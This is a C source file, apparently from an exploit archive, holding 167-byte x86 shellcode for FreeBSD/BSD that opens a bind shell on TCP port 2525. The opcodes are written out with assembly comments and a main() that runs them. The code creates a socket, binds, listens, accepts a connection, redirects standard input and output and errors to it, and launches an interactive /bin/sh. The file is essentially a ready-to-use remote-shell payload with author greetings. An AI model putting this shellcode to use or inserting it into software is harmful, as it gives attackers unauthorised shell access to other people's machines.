108 lines
No EOL
4.4 KiB
C
108 lines
No EOL
4.4 KiB
C
/*
|
|
==================================================
|
|
bds/x86-bindshell on port 2525 shellcode 167 bytes
|
|
==================================================
|
|
*/
|
|
|
|
|
|
/*
|
|
-------------- bds/x86-bindshell on port 2525 167 bytes -------------------------
|
|
* AUTHOR : beosroot
|
|
* OS : BSDx86 (Tested on FreeBSD)
|
|
* EMAIL : beosroot@hotmail.fr
|
|
beosroot@null.net
|
|
* GR33TZ To : joseph-h, str0ke, MHIDO55,.....
|
|
*/
|
|
|
|
const char shellcode[] =
|
|
"\x6a\x00" // push $0x0
|
|
"\x6a\x01" // push $0x1
|
|
"\x6a\x02" // push $0x2
|
|
"\x50" // push %eax
|
|
"\x6a\x61" // push $0x61
|
|
"\x58" // pop %eax
|
|
"\xcd\x80" // int $0x80
|
|
"\x50" // push %eax
|
|
"\x6a\x00" // push $0x0
|
|
"\x6a\x00" // push $0x0
|
|
"\x6a\x00" // push $0x0
|
|
"\x6a\x00" // push $0x0
|
|
"\x68\x10\x02\x09\xdd" // push $0xdd090210
|
|
"\x89\xe0" // mov %esp,%eax
|
|
"\x6a\x10" // push $0x10
|
|
"\x50" // push %eax
|
|
"\xff\x74\x24\x1c" // pushl 0x1c %esp
|
|
"\x50" // push %eax
|
|
"\x6a\x68" // push $0x68
|
|
"\x58" // pop $eax
|
|
"\xcd\x80" // int $0x80
|
|
"\x6a\x01" // push $0x1
|
|
"\xff\x74\x24\x28" // pushl 0x28 %esp
|
|
"\x50" // push %eax
|
|
"\x6a\x6a" // push $0x6a
|
|
"\x58" // pop $eax
|
|
"\xcd\x80" // int $0x80
|
|
"\x83\xec\x10" // sub $0x10,$esp
|
|
"\x6a\x10" // push $0x10
|
|
"\x8d\x44\x24\x04" // lea 0x4%esp,%eax
|
|
"\x89\xe1" // mov %esp,%ecx
|
|
"\x51" // push %ecx
|
|
"\x50" // push %eax
|
|
"\xff\x74\x24\x4c" // pushl 0x4c %esp
|
|
"\x50" // push %eax
|
|
"\x6a\x1e" // push %0x1e
|
|
"\x58" // pop %eax
|
|
"\xcd\x80" // int $0x80
|
|
"\x50" // push %eax
|
|
"\xff\x74\x24\x58" // pushl 0x58 %esp
|
|
"\x50" // push %eax
|
|
"\x6a\x06" // push $0x6
|
|
"\x58" // pop %eax
|
|
"\xcd\x80" // int $0x80
|
|
"\x6a\x00" // push $0x0
|
|
"\xff\x74\x24\x0c" // pushl 0xc %esp
|
|
"\x50" // push %eax
|
|
"\x6a\x5a" // push $0x5a
|
|
"\x58" // pop %eax
|
|
"\xcd\x80" // int $0x80
|
|
"\x6a\x01" // push $0x1
|
|
"\xff\x74\x24\x18" // pushl 0x18 %esp
|
|
"\x50" // push %eax
|
|
"\x6a\x5a" // push $0x5a
|
|
"\x58" // pop %eax
|
|
"\xcd\x80" // int $0x80
|
|
"\x6a\x02" // push $0x2
|
|
"\xff\x74\x24\x24" // pushl 0x24 %esp
|
|
"\x50" // push %eax
|
|
"\x6a\x5a" // push $0x5a
|
|
"\x58" // pop %eax
|
|
"\xcd\x80" // int $0x80
|
|
"\x68\x73\x68\x00\x00" // push $0x6873
|
|
"\x89\xe0" // mov %esp,%eax
|
|
"\x68\x2d\x69\x00\x00" // push $0x692d
|
|
"\x89\xe1" // mov %esp,%ecx
|
|
"\x6a\x00" // push $0x0
|
|
"\x51" // push %ecx
|
|
"\x50" // push %eax
|
|
"\x68\x2f\x73\x68\x00" // push $0x68732f
|
|
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
|
|
"\x89\xe0" // mov %esp,%eax
|
|
"\x8d\x4c\x24\x08" // lea 0x8 %esp,%ecx
|
|
"\x6a\x00" // push $0x0
|
|
"\x51" // push %ecx
|
|
"\x50" // push %eax
|
|
"\x50" // push %eax
|
|
"\x6a\x3b" // push $0x3b
|
|
"\x58" // pop %eax
|
|
"\xcd\x80"; // int $0x80
|
|
|
|
int main() {
|
|
|
|
void (*hell)() = (void *)shellcode;
|
|
return (*(int(*)())shellcode)();
|
|
|
|
}
|
|
|
|
|
|
|
|
// the end o.O
|